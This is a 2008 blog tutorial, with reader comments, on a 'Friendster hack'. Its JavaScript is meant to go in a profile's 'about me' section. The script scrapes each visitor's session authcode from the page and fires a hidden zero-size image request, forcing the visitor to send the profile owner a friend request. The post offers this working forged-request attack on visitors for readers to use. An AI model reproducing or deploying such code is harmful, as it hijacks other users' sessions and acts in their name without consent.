Home > Friendster, Javascript > Auto Add Friends Using (Javascript) Friendster Hacks

Auto Add Friends Using (Javascript) Friendster Hacks

September 27th, 2008 Admin Leave a comment Go to comments

This is a little trick using javascript inserted to your profile in about me or who i want to meet sections. This script will add another Friendster user become your friends when they view your profile and not your friends yet :)

Ok let’s go. For details how to insert and generate JS script to embed in profile, please view my past post about Boost Your Friends Using (Javascript) Friendster Hacks :) I assummed you already have file hosting account in Fileave or Ripway. Copy this code below into your notepad and rename into, example my-script.js or if you already have previous js file in file hosting account, just edit it and save :)

?View Code JAVASCRIPT
var afaimg = document.createElement('span');
afaimg.id = "addme";
document.getElementsByTagName('head')[0].appendChild(afaimg);
function afa() {
var eadd = "Your Email Address";
var k = document.getElementById("controlPanelButtons").innerHTML;
var a = k.slice(k.indexOf("authcode="));
var m = a.slice(9,39);
document.getElementById("addme").innerHTML = "<img src=\"http://www.friendster.com/addfriendrequest.php?authcode="+m+"&uid="+pageOwnerID+"&email="+eadd+"&firstname=&lastname=&friend=&submit=1\" width=\"0\" height=\"0\" />";
}
if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();};

Please change Your Email Address in line 5 with your real email address used in your Friendster account. Now everytime another Friendster user view your profile they’ll add into your friends list :D

Categories: Friendster, Javascript Tags:
  1. October 5th, 2008 at 19:49 | #1

    good post :D

    you’re a master :D

  2. October 5th, 2008 at 20:17 | #2

    Waduh fer, gw malah tertarik sama spoilernya di atas :D

    asik kayaknya tuh

    Biar tetep dikira orang luar, berhubung postinganya pake bahasa inggris :mrgreen:

    wow thats awesome. It’s a very good job. Thanks a lot for the script. I’m looking for this

  3. Admin
    October 6th, 2008 at 15:58 | #3

    Akh .. thnx Uncle :)

    I’ve got this from other source :)

  4. Admin
    October 6th, 2008 at 16:05 | #4

    Bro Utcha … Lucu bgt seh :)

    Iyah pake ajah itu pluginnya .. mirip spoiler y?!

    Cool!

  5. October 11th, 2008 at 10:36 | #5

    Thnx.

  6. October 14th, 2008 at 22:33 | #6

    I never knew this. Thanks!

  7. November 2nd, 2008 at 02:35 | #7

    that’s cool, i will try this…by the way, thanks for always visisting my page! i like your page too!!!

  8. dieodoo
    November 29th, 2008 at 07:19 | #8

    mas admin itu setelah diganti kodenya di paste dimana?? about me or who i met or media box.. mohon bantuannya

  9. Admin
    November 29th, 2008 at 07:45 | #9

    @diedoo

    Biasanya d about me :)

  10. February 19th, 2009 at 16:15 | #10

    Can i know if this trick still work? Because i tried it and nothing happen when i view my profile from other account.

Comment pages
1 2 90
  1. September 27th, 2008 at 23:13 | #1